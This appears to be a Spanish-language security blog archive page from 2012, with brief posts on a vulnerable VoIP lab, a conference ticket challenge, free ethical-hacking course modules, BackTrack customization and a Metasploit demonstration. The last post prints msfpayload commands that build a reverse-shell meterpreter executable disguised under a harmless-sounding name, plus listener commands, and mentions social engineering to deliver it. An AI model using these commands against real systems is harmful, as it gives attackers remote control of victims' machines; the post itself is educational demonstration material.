jueves, 15 de noviembre de 2012
martes, 13 de noviembre de 2012
Busy Tone Vulnerable PBX
Con el fin de poder realizar pruebas de seguridad sobre
un ambiente controlado de VoIP y Comunicaciones Unificadas @fixxx3r pone disponible Busy Tone Vulnerable PBX
Fuente: busy-tone.org
Network Forensics en el SecZone
Si quieres ir al 2º Congreso de Seguridad Informática Security-Zone, aquí está tu oportunidad de conseguir una entrada.
Link: nonroot
Link: nonroot
Quieres ir al Security Zone??
MINI RETO #4 XOR IT
Este reto esta dedicado a todos aquellos que consideren que ganarse una
entrada con un sorteo no es meritorio y prefieren hacer un poco mas de
esfuerzo ;)
La primera persona que envíe la respuesta correcta al correo
fernando.a.quintero AT gmail.com acompañada de un corto resumen explicando como logró solucionarlo se ganará una entrada* para el evento Security Zone que se realizará el 6 y 7 de Diciembre de 2012 en la ciudad de Cali, Colombia.
Muchas veces un XOR es solo el inicio, no pierdas la cabeza con este reto.
Bienvenido al mini reto #4 : XOR IT!
*Gastos adicionales como transporte, alimentación, alojamiento, cerveza, talleres, etc. NO están incluidos.
Buena suerte.
Fuente: nonroot
miércoles, 15 de febrero de 2012
Capacitación gratuita para realizar el CEH de EC-Council
Actualmente se han publicado 6 módulos para capacitarse gratis y realizar el CEH de EC-Council:
- Curso de EH (Modulo o) Introducción
- Curso de EH (Modulo 1) Reconocimiento
- Curso de EH (Modulo 1) RECONOCIMIENTO (PRACTICAS)
- Curso de EH (Modulo 2) Scanning
- Curso de EH (Modulo 2) SCANNING (PRACTICAS)
- Curso de EH (Modulo 3) Enumeración
- Curso de EH (Modulo 3) ENUMERACION (PRACTICAS)
- Curso de EH (Modulo 4) Linux
- Curso de EH (Modulo 5) Ingeniería Social
- Curso de EH (Modulo 6) System Hacking
BackTrack personalizado
Offensive-Security creadores de la distribución de seguridad informática por excelencia, BackTrack Linux,
acaba de anunciar un nuevo servicio que permite a empresas,
organizaciones y personas del común, personalizar algunas opciones de BackTrack para ajustarlo a sus necesidades particulares.
BackTrack ISO Customization Service from Offensive Security on Vimeo.
Fuente: DragonJar
BackTrack ISO Customization Service from Offensive Security on Vimeo.
Fuente: DragonJar
jueves, 5 de enero de 2012
Metasploit en Windows Server 2008 R2 SP1
En esta demostración con fines educativos se observa un Windows Server
2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado
del servicio Hyper-V Virtualization y la conexión al equipo atacante
mediante Putty (192.168.1.254) donde previamente se construye el archivo
.exe, llamado C0lds0ft.exe:
Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:
Fuente segu-info
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=4444 X >/root/Escritorio/C0lds0ft.exe
Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.254 set LPORT 444 exploit
Fuente segu-info
Suscribirse a:
Entradas (Atom)